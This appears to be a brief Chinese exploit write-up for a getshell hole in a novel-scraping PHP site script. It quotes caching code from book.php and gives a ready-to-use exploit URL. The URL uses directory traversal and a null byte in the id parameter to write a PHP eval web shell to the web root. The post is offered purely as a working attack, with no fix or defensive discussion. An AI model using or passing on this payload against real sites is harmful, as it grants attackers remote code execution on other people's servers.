狂盗小说小偷 GET Shell 漏洞

By：Cond0r

很傻比的一漏洞

必须开启缓存才能利用

先看代码

book.php：

$kd_cachedir = "./cache";
if($kd_book_cache=="ture"){//缓存必须开启
   $lastflesh = @filemtime($kd_cachedir."/book$shuid.html");
// echo $lastflesh;
     if(!file_exists("./cache/book$shuid.html") or ($lastflesh + ($kd_book_hctime * 60 * 60) <= time())){
           ob_start();
              include "./templates/$kd_moban/book.html";
              $mianfei = ob_get_contents();
              ob_end_clean();
                  file_put_contents("./cache/book$shuid.html",$mianfei);
                 echo file_get_contents($kd_cachedir."/book$shuid.html");
          }else{
                     echo file_get_contents("./cache/book$shuid.html");

                  }
      }else{
            include "./templates/$kd_moban/book.html";
          }
?>

exp:http://1.com/book.php?id=/../../1.php%00“><?php eval($_POST[a])?>

根目录：1.php

本地测试：

文章目录